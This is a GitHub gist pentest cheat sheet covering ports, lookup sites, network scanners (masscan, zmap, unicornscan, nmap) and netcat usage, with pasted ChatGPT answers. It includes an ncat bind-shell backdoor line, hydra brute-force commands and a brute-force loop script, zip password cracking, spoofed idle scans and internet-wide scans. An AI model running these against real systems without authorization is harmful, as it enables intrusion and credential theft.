Skip to content

Instantly share code, notes, and snippets.

@githubfoam

githubfoam/pentest cheat sheet

Last active February 29, 2024 09:43
Show Gist options
  • Star 39 You must be signed in to star a gist
  • Fork 20 You must be signed in to fork a gist
  • Save githubfoam/4d3c99383b5372ee019c8fbc7581637d to your computer and use it in GitHub Desktop.
Save githubfoam/4d3c99383b5372ee019c8fbc7581637d to your computer and use it in GitHub Desktop.
Download ZIP
pentest cheat sheet
Raw
pentest cheat sheet
----------------------------------------------------------------------------------------------------
OWASP Top Ten https://owasp.org/www-project-top-ten/
The CWE Top 25
https://www.sans.org/top25-software-errors/
2022 CWE Top 25 Most Dangerous Software Weaknesses
https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html
OSSTMM 3 – The Open Source Security Testing Methodology Manual
https://www.isecom.org/OSSTMM.3.pdf
OWASP Web Security Testing Guide
https://owasp.org/www-project-web-security-testing-guide/
----------------------------------------------------------------------------------------------------
0-1023 - Well known ports (HTTP, SMTP, DHCP, FTP etc)
1024-49151 - Reserved Ports
49152-65535 - Dynamic/Private Ports
Windows : Start → "cmd" → Run as Administrator → "netstat -bn"
Linux : a In the terminal, run the command: "ss -tln"
MAC : lsof -iTCP -sTCP:LISTEN -n -P
https://portchecker.co
https://www.yougetsignal.com/tools/open-ports/ (Scan All Common Ports)
https://www.ipfingerprints.com/portscan.php
https://www.portcheckers.com/
21: FTP (File Transfer Protocol)
22: SSH (Secure Shell)
23: Telnet (Remote Login Service)
25: SMTP (Simple Mail Transfer Protocol)
43: WHOIS Protocol obtaining the registration of ownership of domain names and IP addresses
53: DNS (Domain Name System)
67: DHCP Dynamic Host Configuration Protocol
69: TFTP Trivial File Transfer Protocol - a simple file transfer protocol.
80: HTTP (Hypertext Transfer Protocol)
110: POP3 (Post Office Protocol 3)
115: SFTP (Secure File Transfer Protocol)
123: NTP (Network Time Protocol)
135: RPC
139: NetBIOS
143: IMAP (Internet Message Access Protocol)
161: SNMP (Simple Network Management Protocol)
194: IRC (Internet Relay Chat)
389: LDAP Lightweight Directory Access Protocol.
443: SSL / HTTPS (Hypertext Transfer Protocol Secure)
445: SMB (Server Message Block)
465: SMTPS (Simple Mail Transfer Protocol over SSL)
515: LPD Line Printer Daemon. Remote printing protocol on the printer.
554: RTSP (Real Time Stream Control Protocol)
636: LDAP over SSL or Secure LDAP
873: RSYNC (RSYNC File Transfer Services)
993: IMAPS (Internet Message Access Protocol over SSL)
995: POP3S (Post Office Protocol 3 over SSL)
1080: SOCKS SOCKet Secure. Receiving protocol secure anonymous access.
1433: MSSQL
3128: Proxy Currently the port often used proxies.
3306: MySQL
3389: RDP (Remote Desktop Protocol)
5432: PostgreSQL
5631/5632: PC Anywhere
5900: VNC (Virtual Network Computing)
5938: TeamViewer - Remote control system for ensuring your computer and data exchange.
6379: Redis
7070: For direct connections, TCP Port 7070 is used for listening by default. This port is opened when installing AnyDesk.
8080: Alternate port for the HTTP protocol. Sometimes used proxies.
9001/9030: Tor commonly uses ports 9001 and 9030 for network traffic and directory information.
11211: Memcached
25565: Minecraft
44158: Helium Miner Port
----------------------------------------------------------------------------------------------------
https://www.virustotal.com #Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security communit
https://dnslytics.com/ #The ultimate online investigation tool Search for Domain, IPv4,IPv6
https://www.ipvoid.com/ #IP blacklist check, whois lookup, dns lookup, ping, and more
https://www.abuseipdb.com/
https://talosintelligence.com/ #Query by IP, domain, or network owner for real-time threat data.
----------------------------------------------------------------------------------------------------
Look up IP Address Location https://whatismyipaddress.com/ip-lookup
----------------------------------------------------------------------------------------------------
Real-time problem & outage monitoring https://downdetector.com/
----------------------------------------------------------------------------------------------------
By defanging the URLs, you can effectively deliver these links without triggering spam filters, reputation-based filters, or being quarantined. This tool ensures that your intended recipients receive the link and allows them to investigate and address any potential security concerns
https://trustifi.com/url-defang-tool/
----------------------------------------------------------------------------------------------------
#DMARC, SPF query
https://dmarcian.com/spf-survey/
https://mxtoolbox.com/SuperTool.aspx?action=mx%3atau.edu.tr&run=toolpage
----------------------------------------------------------------------------------------------------
Penetration Testing Methodologies
https://owasp.org/www-project-web-security-testing-guide/latest/3-The_OWASP_Testing_Framework/1-Penetration_Testing_Methodologies
Penetration Testing Framework 0.59
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
----------------------------------------------------------------------------------------------------
#ChatGPT
While I cannot provide specific website URLs or endorse any particular password list sources, I can mention some commonly used password lists for penetration testing purposes. These password lists are often used for testing weak or common passwords during security assessments:
SecLists: SecLists is a popular collection of various password lists, including common passwords, leaked passwords, default credentials, and more. It is regularly updated and widely used in penetration testing.
RockYou: RockYou is a well-known password list that gained attention after a data breach. It contains millions of commonly used passwords and is often used for password cracking and testing purposes.
CrackStation: CrackStation provides a free online password cracking tool, along with a downloadable password hash list. The hash list includes a large number of unique passwords that can be used for penetration testing.
SkullSecurity: SkullSecurity offers a range of password lists, including wordlists, username lists, and leaked password databases. These lists are frequently used in security assessments and password cracking.
Weakpass: Weakpass is a collection of password lists specifically curated for security testing purposes. It includes lists of commonly used passwords, default credentials, and leaked passwords.
When using password lists for penetration testing, it's important to ensure you have proper authorization and adhere to legal and ethical guidelines. Respect privacy and avoid using password lists that contain sensitive or personal information. Always obtain permission from the system owner or administrator before conducting any security testing activities
----------------------------------------------------------------------------------------------------
#ChatGPT
Penetration testing, also known as pen testing, is a process used to evaluate the security of a network, system or application. When it comes to performing a penetration test for a firewall, there are several steps that can be taken to ensure that the firewall is secure and functioning properly. Here's a general outline of the process:
Define the scope: Before beginning the penetration testing process, it is important to clearly define the scope of the test. This will help to identify the areas of the firewall that need to be tested, as well as any specific vulnerabilities that should be targeted.
Gather information: The next step is to gather as much information as possible about the firewall, including its configuration, rule sets, and any other relevant data. This can be done through a variety of methods, such as network scanning, port scanning, and vulnerability scanning.
Identify vulnerabilities: Once you have gathered information about the firewall, you can begin to identify potential vulnerabilities. This can be done by using various tools and techniques, such as penetration testing software and manual testing methods.
Exploit vulnerabilities: After vulnerabilities have been identified, they can be exploited to determine how they could be used to bypass or circumvent the firewall's security measures.
Document findings: As you perform the penetration testing process, it is important to document your findings in detail. This will help you to identify any issues that need to be addressed, as well as provide a clear record of the testing process for future reference.
Remediate vulnerabilities: Finally, any vulnerabilities that were identified during the testing process should be remediated as quickly as possible. This may involve reconfiguring the firewall, installing software patches, or implementing other security measures to prevent future attacks.
Overall, performing a penetration test for a firewall can help to identify potential security risks and ensure that the firewall is functioning as intended. It is important to follow a structured approach to the testing process, and to work closely with IT professionals to ensure that any vulnerabilities are addressed in a timely and effective manner.
----------------------------------------------------------------------------------------------------
#ChatGPT
There are several online WHOIS databases that you can use to query information about a domain or IP address. Here are some of the most popular ones:
ICANN WHOIS: This is the official WHOIS database maintained by the Internet Corporation for Assigned Names and Numbers (ICANN). It contains information about domain name registrations for all top-level domains (TLDs) and country code TLDs (ccTLDs).
WHOIS.net: This is a free online WHOIS database that allows you to search for domain names, IP addresses, and network blocks. It also provides information about the registrar, registrant, and administrative and technical contacts.
DomainTools WHOIS: This is a comprehensive WHOIS database that contains historical and current WHOIS records for over 350 million domain names. It also provides information about DNS and IP addresses.
WHOIS Lookup by DomainTools: This is a free online WHOIS lookup tool that allows you to search for domain names and IP addresses. It provides basic information about the domain or IP, including the registrar and registrant details.
ARIN WHOIS: This is the WHOIS database maintained by the American Registry for Internet Numbers (ARIN). It contains information about IP address assignments and allocations in North America, South America, and Sub-Saharan Africa.
RIPE WHOIS: This is the WHOIS database maintained by the Réseaux IP Européens (RIPE) Network Coordination Centre. It contains information about IP address allocations and assignments in Europe, the Middle East, and Central Asia.
APNIC WHOIS: This is the WHOIS database maintained by the Asia-Pacific Network Information Centre (APNIC). It contains information about IP address allocations and assignments in the Asia-Pacific region.
Overall, these online WHOIS databases can provide you with a wealth of information about domain names and IP addresses, including the registrar, registrant, administrative and technical contacts, and historical and current WHOIS records.
----------------------------------------------------------------------------------------------------
#linux distros
https://www.kali.org/
https://www.parrotsec.org #Raspberry Pi Images,Hack The Box Edition
https://securityonionsolutions.com/
https://blackarch.org/
https://www.backbox.org/
https://www.pentoo.ch
https://archstrike.org/
https://www.digi77.com/linux-kodachi/
https://sourceforge.net/projects/nst/files/
https://tails.boum.org/
https://www.qubes-os.org
https://sourceforge.net/projects/samurai/files/latest/download
https://remnux.org/
http://www.deftlinux.it/iso/index.html
https://www.caine-live.net/
https://tsurugi-linux.org/
https://github.com/mandiant/flare-vm
https://www.mandiant.com/resources/blog/commando-vm-windows-offensive-distribution
#SANS VMS
https://www.sans.org/tools/sift-workstation/
https://www.sans.org/tools/slingshot/
----------------------------------------------------------------------------------------------------
#regex resources
https://www.regextester.com
https://regex101.com/
https://perldoc.perl.org/perlre
----------------------------------------------------------------------------------------------------
mtr www.google.com
mtr --report google.com
mtr -4b google.com #combined IPv4 only and IP addresses
mtr -n google.com #display numeric IP addresses instead of host names
mtr -c5 google.com #limit the number of pings to a specific value
mtr -r -c 5 google.com >mtr-report #report mode using the -r flag
mtr -rw -c 5 google.com >mtr-report #wide report mode
mtr -i 2 google.com #The default interval between ICMP ECHO requests is one second
mtr --tcp test.com #use TCP SYN packets or UDP datagrams instead of the default ICMP ECHO requests
mtr --udp test.com
mtr -m 35 216.58.223.78 #maximum number of hops (default is 30)
mtr -r -s PACKETSIZE -c 5 google.com >mtr-report #set the packet size used in bytes using the -s
mtr --csv google.com #Print CSV Output
mtr --xml google.com
# find route to example.com
traceroute www.example.com
#find route to example.com using tcptraceroute (which uses tcp to discover path)
tcpdraceroute www.example.com
# The maximum number of hops can be adjusted with the -m flag.
traceroute -m 255 obiwan.scrye.net
# adjust the size of the packet that is sent to each hop by giving the integer after the hostname
traceroute google.com 70
Specify Gateway
sudo traceroute -g 10.0.2.2 yahoo.com
traceroute -g 192.5.146.4 -g 10.3.0.5 35.0.0.0
#shows the path of a packet that goes from istanbul to sanfrancisco through the hosts cairo and paris
#The -I option makes traceroute send ICMP ECHO probes to the host sanfrancisco
#The -i options sets the source address to the IP address configured on the interface qe0
traceroute -g cairo -g paris -i qe0 -q 1 -I sanfrancisco
ip r / ip route #gateway / router
ip r | grep default #default gateway
#The U flag indicates that the route is up;
#The G flag indicates that the route is to a gateway.
#The H flag indicates that the destination is a fully qualified host address, rather than a network.
route -n #Do not use protocol or host name , use IP or port number
route -V #version
route -nee #more detailed information
route -Cn #list kernel’s routing cache information
routel #list routes
routel | grep default #default gateway
Specify Source Interface
sudo traceroute -i eth0 yahoo.com
Autonomous Systems
traceroute -A yahoo.com
traceroute -I google.com
tracepath yahoo.com
tracepath -n yahoo.com
tracepath -b yahoo.com
sets the initial packet length
tracepath -l 28 yahoo.com
set maximum hops (or maximum TTLs) to max_hops
tracepath -m 5 yahoo.com
set the initial destination port to use
tracepath -p 8081 yahoo.com
----------------------------------------------------------------------------------------------------
sudo apt-get install p0f -yqq
p0f -L #LISTENING ALL THE INTERFACES
p0f -i eth0 -p -o /tmp/p0f.log # one interface and logging, -p promiscous mode
p0f -r /tmp/dump.pcap -o dump-result.log # analyze pcap file
----------------------------------------------------------------------------------------------------
#ZIP Password Cracking Windows
>zip2john.exe test.zip > test.hash #generate the hash with zip2john
>type test.hash
>john.exe --pot=test.pot --wordlist=\tmp\wordlists\Passwords\Common-Credentials\10-million-password-list-top-1000000.txt
>john.exe --pot=test.pot --show test.hash
>type test.pot
#ZIP Password Cracking Linux
zip2john test.zip > zip.hash #generate the hash with zip2john
john --wordlist=/tmp/wordlists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt zip.hash
----------------------------------------------------------------------------------------------------
#ChatGPT
The PCAP-over-IP protocol has several use cases:
Remote Network Monitoring: PCAP-over-IP can be used to remotely monitor network traffic on a specific network segment or appliance, without having to be physically present at the location of the device.
Troubleshooting: When troubleshooting network issues, it can be helpful to capture network packets in real-time. PCAP-over-IP can be used to capture and transmit network packets to a remote location where they can be analyzed by network administrators or other experts.
Compliance and Security: PCAP-over-IP can be used to capture network packets for compliance and security purposes, such as monitoring network traffic for suspicious or malicious activity.
Network Testing: PCAP-over-IP can be used for network testing and validation, by capturing and analyzing network traffic in real-time to ensure that network devices and applications are functioning properly.
----------------------------------------------------------------------------------------------------
#networkminer windows 10
#PCAP-over-IP is a method for reading a PCAP stream, which contains captured network traffic, through a TCP socket instead of reading the packets from a PCAP file
Common use cases for PCAP-over-IP include:
Transmitting captured network traffic in real time to a remote machine
Transferring network traffic between two applications on the same host
Providing decrypted traffic from a TLS interception proxy to a packet analyzer or IDS.
Software that can sniff network traffic, but doesn't support PCAP-over-IP, can read packets from a PCAP-over-IP provider with help of a netcat and tcpreplay combo.
"nc [SERVER] 57012 | tcpreplay -i eth0 -t "
"nc -l 57012 < sniffed.pcap" create a PCAP-over-IP server is to simply read a PCAP file into a netcat listener
"nc 192.168.1.2 57012 | tshark -r -" The packets in “sniffed.pcap” can then be read remotely using PCAP-over-IP
#read PCAP-over-IP with Wireshark and tshark
wireshark -k -i TCP@192.168.1.2:57012
tshark -i TCP@192.168.1.2:57012
#Live Remote Sniffing
#Sniffed traffic can be read remotely over PCAP-over-IP in real-time simply by forwarding a PCAP stream with captured packets to netcat
#Tcpdump is not available for Windows, but dumpcap is since it is included with Wireshark.
tcpdump -U -w - not tcp port 57012 | nc -l 57012
dumpcap -P -f "not tcp port 57012" -w - | nc -l 57012
----------------------------------------------------------------------------------------------------
(netcat or nc or ncat)
#Use Netcat as a Simple Web Server
vi index.html #make a simple HTML file
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888 #
http://server_IP:8888 #access the content,serve the page, and then the netcat connection will close
"while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done" #have netcat serve the page indefinitely by wrapping the last command in an infinite loop
netcat -z -v domain.com 1-1000 #scan all ports up to 1000
netcat -z -n -v 198.51.100.0 1-1000 #-n flag to specify that you do not need to resolve the IP address using DNS
netcat -z -n -v 198.51.100.0 1-1000 2>&1 | grep succeeded #redirect standard error to standard output using the 2>&1 bash syntax. then filter the results with grep:
#gather more information about a service running on a system’s open port , known as banner grabbing
nc -nvv x.x.x.x 80
nc -uvz 192.168.58.9 161
nc u v w2 x.x.x.x 1-1024 #netcat used to perform a UDP scan of the lower 1024 ports
$ nc -l 8080 #listening to port 8080 for inbound connections
nc -vvul -p 9192 // listen UDP traffic
nc -vvl -p 8182 // listen TCP traffic
#listen UDP traffic on the port
$ nc -vvul -p 9192 &
[3] 24622
$ Listening on [0.0.0.0] (family 0, port 9192)
#verify netcat is listening on the port
$ nc -vuz -w 3 0.0.0.0 9192
XXXXXConnection to 0.0.0.0 9192 port [udp/*] succeeded!
$ ping 8.8.4.4 | nc -v 192.168.99.100 8182 // send traces to open a TCP port
$ ping 8.8.8.8 | nc -vu 192.168.99.100 9192 // send traces to an UDP port
// send traces to an UDP port without netcat
$ ping 8.8.4.4 > /dev/udp/192.168.99.100/9192
// send traces to a TCP port without `netcat`
$ tail -f /opt/wso2esb01a/repository/logs/wso2carbon.log > /dev/tcp/192.168.99.100/8182
$ tail -f /opt/wiremock/wiremock.log | nc -vu 192.168.99.100 9192 #WireMock is a simulator for HTTP-based APIs.
// send traces to an UDP port without `netcat`
$ tail -f /opt/wso2am02a/repository/logs/wso2carbon.log > /dev/udp/192.168.99.100/9192
$ nc -l 1234 > filename.out #Start by using nc to listen on a specific port, with output captured into a file
$ nc host.example.com 1234 < filename.in #Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred
$ netcat -l 4444 > received_file #instead of printing information onto the screen, place all of the information straight into a file
$ netcat domain.com 4444 < original_file # use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted
#On the receiving end, anticipate a file coming over that will need to be unzipped and extracted by typing
'netcat -l 4444 | tar xzvf -' #The ending dash (-) means that tar will operate on standard input, which is being piped from netcat across the network when a connection is made.
'tar -czf - * | netcat domain.com 444' # pack them into a tarball and then send them to the remote computer through netcat
$ nc -l -u 1234 #listening a udp port ‘1234’ , verify w sudo netstat -tunlp | grep 1234
$ nc -v -u 192.168.105.150 53 #send or test UDP port connectivity to a specific remote host
$ nc 192.168.1.100 80 #connection to server with IP address 192.168.1.100 will be made at port 80 & we can now send instructions
GET / HTTP/1.1 #get the page name
HEAD / HTTP/1.1 #get banner for OS fingerprinting
$ echo -n "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80 #retrieve the home page of a web site
#NC as chat tool
$ ncat -l 8080 #configure server to listen to a port & make connection to server from a remote machine on same port & start sending message
$ ncat SERVER_IP 8080 #On remote client machine
#NC as a proxy
#all the connections coming to our server on port 8080 will be automatically redirected to 192.168.1.200 server on port 80
$ ncat -l 8080 | ncat 192.168.1.200 80 #using a pipe, data can only be transferred & to be able to receive the data back
#create a two way pipe,send & receive data over nc proxy
$ mkfifo 2way
$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way
$ ncat -l 8080 > file.txt #Start with machine on which data is to be received & start nc is listener mode
$ ncat 192.168.1.100 8080 --send-only < data.txt #on the machine from where data is to be copied, –send-only option will close the connection once the file has been copied
$ ncat -l 10000 -e /bin/bash #create a backdoor,‘e‘ flag attaches a bash to port 10000
$ ncat 192.168.1.100 1000 #a client can connect to port 10000 on server
$ nc -p 31337 -w 5 host.example.com 42 #Open a TCP connection to port 42 of host.example.com, using port 31337 as the source port, with a timeout of 5 seconds
$ nc -s 10.1.2.3 host.example.com 42 #Open a TCP connection to port 42 of host.example.com using 10.1.2.3 as the IP for the local end of the connection
$ nc -lU /var/tmp/dsocket #Create and listen on a Unix Domain Socket
$ nc -x10.2.3.4:8080 -Xconnect host.example.com 42 #Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080
$ ncat -u -l 80 -c 'ncat -u -l 8080' #all the connections for port 80 will be forwarded to port 8080
$ ncat -w 10 192.168.1.100 8080 #Listener mode in ncat will continue to run,configure timeouts with option ‘w’
$ ncat -l -k 8080 #When client disconnects from server, after sometime server also stops listening.force server to stay connected & continuing port listening with option ‘k’.
----------------------------------------------------------------------------------------------------
#when the user knows the format of requests required by the server.
#an email may be submitted to an SMTP server
$ nc localhost 25 << EOF
HELO host.example.com
MAIL FROM: <user@host.example.com>
RCPT TO: <user2@host.example.com>
DATA
Body of email.
.
QUIT
EOF
----------------------------------------------------------------------------------------------------
# it is necessary to first make a connection, and then break the connection when the banner has been retrieved.
#This can be accomplished by specifying a small timeout with the -w flag
#or by issuing a "QUIT" command to the server
$ echo "QUIT" | nc host.example.com 20-30
SSH-1.99-OpenSSH_3.6.1p2
Protocol mismatch.
220 host.example.com IMS SMTP Receiver Version 0.84 Ready
----------------------------------------------------------------------------------------------------
#parallelized login cracker which supports numerous protocols to attack
hydra -L unix_users.txt -P unix_passwords.txt ssh://192.169.42.33
hydra -l user -P unix_passwords.txt ssh://192.169.42.33
hydra -l root -P root_userpass.txt ssh://192.169.42.33
hydra -L ../.. /User.txt -P ../../../Pass.txt 192.169.42.33 ssh
nmap -p 21 10.10.10.16 -> ftp 10.10.10.16
hydra -L Usernames.txt -P Passwords.txt ftp://10.10.10.16
hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form “/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout” -vV -f
hydra -l admin -P /usr/share/wordlists/test.txt 192.168.80.134 http-post-form “/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login” -vV -f
#ChatGPT
THC-Hydra is indeed a versatile and powerful tool for conducting brute-force attacks on various login services. However, it's essential to clarify that using it to test for the Logjam vulnerability is not a standard or recommended method. Logjam is a vulnerability related to the Diffie-Hellman key exchange in SSL/TLS, and it's typically detected and assessed differently, as explained in the previous response.
Here's an example of how THC-Hydra can be used for a more standard brute-force attack against an HTTP login page. Please note that this example is for educational purposes only and should only be performed on systems you own or have explicit permission to test.
Install THC-Hydra: You can typically install THC-Hydra on Linux using package managers like apt or yum. For example, on Debian-based systems:
bash
Copy code
sudo apt-get install hydra
Prepare a Wordlist: You need a list of possible usernames and passwords to use for the brute-force attack. You can create a simple text file containing pairs of usernames and passwords, one pair per line. For example, wordlist.txt:
plaintext
Copy code
admin:password
user:123456
john:secret
Run the Brute-Force Attack: Use THC-Hydra to perform the brute-force attack. For an HTTP login page, the command might look like this:
bash
Copy code
hydra -l admin -P wordlist.txt example.com http-post-form "/login.php:user=^USER^&password=^PASS^:Invalid login" -t 4
-l: Specify the username to start with (in this case, "admin").
-P: Specify the path to the wordlist file.
example.com: Replace this with the target website's URL.
http-post-form: Specify the login form details.
"/login.php:user=^USER^&password=^PASS^:Invalid login": Define the login form parameters, where ^USER^ and ^PASS^ will be replaced with usernames and passwords from the wordlist.
-t 4: Set the number of parallel tasks to 4 (adjust as needed).
Review the Results: THC-Hydra will attempt to log in using the usernames and passwords from the wordlist. If successful, it will display the valid credentials.
----------------------------------------------------------------------------------------------------
#ChatGPT
Certainly! Here's a bash script that loops through a passwords file in the specified directory and
runs the Hydra command with different password files
#!/bin/bash
username_list="<username list>"
passwords_directory="/path/to/SecLists/Passwords/Common-Credentials/"
port="<port>"
output_file="<output file>"
target_ip="<target IP>"
protocol="<protocol>"
# Loop through password files in the directory
for password_file in "$passwords_directory"/*; do
if [ -f "$password_file" ]; then
echo "Running Hydra with password file: $password_file"
# Run Hydra command
hydra -L "$username_list" -P "$password_file" -s "$port" -o "$output_file" "$target_ip" "$protocol"
echo "Hydra completed for password file: $password_file"
echo ""
fi
done
Make sure to replace <username list>, /path/to/SecLists/Passwords/Common-Credentials/, <port>, <output file>, <target IP>, and <protocol> with the appropriate values specific to your scenario.
Save the script in a file, e.g., hydra_script.sh, and make it executable using the command chmod +x hydra_script.sh. Then, you can run the script by executing ./hydra_script.sh in the terminal.
The script will iterate through each password file in the specified directory and execute the Hydra command with the respective password file. It will display a message before and after running Hydra for each password file.
Remember to exercise caution and ensure that you have proper authorization before using this script or conducting any security testing activities.
----------------------------------------------------------------------------------------------------
zmap -p 80 172.217.0.0/24 -o IPresults.csv #scan 255 IP addresses on a class B network
wc -l IPresults.csv #the total count of IP addresses with open port 80
zmap -p 80 10.0.2.15 -o LANresults.csv
zmap -p 10.0.0.0/16 -o LANresults.csv
#scan only 10.0.0.0/8 and 192.168.0.0/16 on TCP/80
zmap -p 80 10.0.0.0/8 192.168.0.0/16
mousepad /etc/zmap/blacklist.conf #Zmap's blacklist
zmap -B 10M -p 80 10.0.0.0/16 -o LANresults.csv #limit the bandwidth Zmap uses to 10 thousand packets per second
#scan 10,000 random addresses on port 80 at a maximum 10 Mbps
zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.csv
zmap -B 10M -p 80 -n 10000 -o results.csv
----------------------------------------------------------------------------------------------------
SYN : -mT
ACK scan : -mTsA
Fin scan : -mTsF
Null scan : -mTs
Xmas scan : -mTsFPU
Connect Scan : -msf -Iv
Full Xmas scan : -mTFSRPAU
scan ports 1 through 5 : (-mT) host:1-5
unicornscan -r30 -mT adaptercart.com #get details of open and closed ports of a website called adaptercart.
unicornscan -r33 -mT linuxhint.com #send 33 packets per second by adding -r33 –mT to indicate scan (m) using the TCP protocol.
unicornscan -r33 -mT linuxhint.com:67,420 #ports 67 and 420
unicornscan -r300 -mU linuxhint.com #scan for UDP ports
unicornscan -r30 -mT google.com # get details of open and closed ports of a website
unicornscan 216.1.0.0/8:5505 -r500 -w huntfor5505.pcap -W1 -s 192.168.100.35 #Saving results to a PCAP file
unicornscan –mU –v –I 192.168.1.1/24 #perform a UDP scan on the whole network
unicornscan -msf -v 192.168.1.1/24 #perform a TCP SYN Scan on a whole network
unicornscan -i eth1 -Ir 160 -E 192.168.1.0/24:1-4000 gateway:a
unicornscan 192.168.100.35 192.168.100.45
unicornscan 192.168.100.35
unicornscan 192.168.100.35/24:31 #Scanning Class C networks find all the IPs with port 31 open
unicornscan 192.168.1.250 –Iv #get the TTL value of corresponding ports and identify the operating system
----------------------------------------------------------------------------------------------------
masscan --regres #test whether the installation of masscan is proper
masscan -p80,8000-8100 10.0.0.0/8 2603:3001:2d00:da00::/112 #scan the 10.x.x.x subnet, and 2603:3001:2d00:da00::x subnets
masscan 10.10.10.1/1 -p80
masscan 198.134.112.244 -p443
masscan 198.134.112.240/28 -p80,443,25 #multiple ports
masscan 198.134.112.240/28 -p1000-9999 #range of ports
masscan 192.168.1.105 ‐‐top-ports 10
masscan 198.134.112.0/20 --top-ports 100 --rate 100000 > output.txt
masscan 192.168.1.105 ‐‐top-ports 10 ‐‐excludefile exclude-list.txt
masscan 10.10.10.1 -p1-50 #Multi port scan
masscan 10.10.10.1 -p1,20,80
masscan 10.10.10.1 -pU:53 #UDP scan
masscan 10.0.0.1/24 --rate 10000 -p80 #increase the speed of the scan
masscan 180.215.0.0/16 -p0-1000 --exclude=180.215.122.120 #Exclude IP
masscan 180.215.0.0/16 --exclude=180.215.122.120 -p22,23,80,443
masscan 10.0.0.0/8 -p80 --open-only #scan for only open ports
masscan 0.0.0.0/0 --excludefile 255.255.255.255 -pU:53 --banners #Gathering the server version by entering –banners
masscan 10.1.1.1/24 -p 0-65535 --rate 1000000 --open-only --http-user-agent \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" \
-oL "output.txt"
host google.com #gives the IP of google.com web server
masscan 216.58.196.0/24 -p80,443 #scan IPs 216.58.196.1-254
#grab banners from the IPs
#kali has IP address 192.168.1.4.specify a source IP in the 192.168.1.0/24 range
masscan 216.58.196.218 -p 80,443 --banners --source-ip 192.168.1.200 #
masscan 216.58.196.0/24 -p80,443 --output-format=xml --output-filename=test.xml #save the results into file
masscan 216.58.196.0/24 -p80,443 -oX test.xml # Wireshark,Etherape to visualize
masscan 216.58.196.0/24 -p80,443 -oX test.xml #pause scan ctrl+c
masscan --resume paused.conf #resume the scan
masscan 0.0.0.0/4 -p80 --rate 100 --offline #scan whole IP address subnets but without going into the internet.
#increase the rate gradually to 1000, 100000 one at a time and see how much the network & system can perform
#Compare the times required
masscan 0.0.0.0/4 -p80 --rate 10000000 --offline #
masscan 0.0.0.0/0 -p22 --rate 10000000
masscan 192.168.1.1 -p0-65535 #scan all the ports between 0 and 65535 on the target host
masscan 0.0.0.0/0 -p0-65535 --rate 10000000 #at full speed (10 million p/s).
masscan 0.0.0.0/0 -p0-65535 #Scanning the entire Internet is bad
masscan 0.0.0.0/0 -p0-65535 --excludefile exclude.txt #blacklist or exclude ranges
masscan 0.0.0.0/0 -p0-65535 -oX scan.xml #saves the results in an XML file
masscan -p 80 0.0.0.0/0 --excludefile IPBlacklist.list -oL result.out
#increases the rate to 100,000 packets/second
#scan the entire Internet in about 10 hours per port (or 655,360 hours if scanning all ports).
masscan 0.0.0.0/0 -p0-65535 --max-rate 100000
#Performance testing
#The bogus --router-mac keeps packets on the local network segments so that they won't go out to the Internet
masscan 0.0.0.0/4 -p80 --rate 100000000 --router-mac 66-55-44-33-22-11 #
masscan 172.217.0.0/16 --rate=1 -p80,443 --ping #an ICMP Echo request also with the scan
masscan <target> <ports> --adapter-ip <ipaddress>
masscan <target> <ports> --adapter-port <port/port-range>
#multiple instances of masscan for the same range of IPs
masscan 172.217.0.0/16 --rate=1 -p80,443 --shards 1/2 #Attacker 1 the first instance would scan the IPs with index 0
masscan 172.217.0.0/16 --rate=1 -p80,443 --shards 2/2 #Attacker 2 second instance would scan IPs with index 1
masscan -c config #sample configuration file,all the options together in 1 single config file
# Adapter
adapter-ip = 10.108.51.130
adapter-port = 5000-5127
rate = 10.00
shard = 1/1
# Targets
retries = 2
ports = 80,443,U:53,U:161
range = 172.217.0.0/16
exclude = 172.217.0.50
exclude-file /root/masscan-exclusion.list
#Output Options
output-format = xml
show = open
output-filename = google.xml
# Scan Options
banners = true
ping = true
----------------------------------------------------------------------------------------------------
#Web Content Scanner
dirb http://192.169.42.33 /usr/share/dirb/wordlists/common.txt
#web server scanner
nikto -host 192.169.42.33
#set mtu size 8
nmap --mtu 8 192.169.42.3 --packet_trace -n -p 80
nmap -p80 192.169.42.3 -oG -|nikto -h -
nmap -p0-65535 192.168.2.7
----------------------------------------------------------------------------------------------------
#system who is using the id field or increments it when sending packets out, these systems are called "idle systems"
#case study:Port Opened
#send a SYN+ACK packet to the idle system (the printer)
#replies back with RST,ID=xx (ID=56)
#send a spoofed SYN packet to the target system (mask IP as if masked IP belongs to the printer)
#if the port is open, system sends to the printer a SYN+ACK packet,the printer replies to the target system with a RST,ID=XX+1(ID=57)
#case study:Port Closed
# send a SYN+ACK packet to the idle system (the printer)
#replies back with RST,ID=xx (ID=56)
#send a spoofed SYN packet to the target system (mask IP as if masked IP belongs to the printer)
#since the port is closed the target system does not send any packet to the printer
#send a packet to the printer, if the printer sends a packet with RST, ID=initialID+1, this means port is closed
# find a zombie machine,If the machine is a zombie, in the message: "IP ID Sequence Generation: Incremental".
nmap -O -v vg-ubuntu-02 | grep "IP ID Sequence Generation: Incremental"
# find a zombie machine,If the machine is a zombie, in the message: "IP ID Sequence Generation: Incremental".
hping3 -SA <zombie> -c 1
hping3 --spoof <zombie> -S <target> -p 21 -c 1
hping3 -SA <zombie> -c 1
----------------------------------------------------------------------------------------------------
#Scan ports 8079-8081 (-S8079-8081) through the eth0 interface (-i eth0),
#do not resolve hostnames (-n), use TCP (-pTCP) via the gateway (192.168.1.1) against the target IP (192.168.0.1)
root@kali:~# firewalk -S8079-8081 -i eth0 -n -pTCP 192.168.1.1 192.168.0.1
----------------------------------------------------------------------------------------------------
#web vulnerability scanner
uniscan -u http://192.169.42.3 -qweds
ls /usr/share/uniscan/report/
192.169.42.3.html
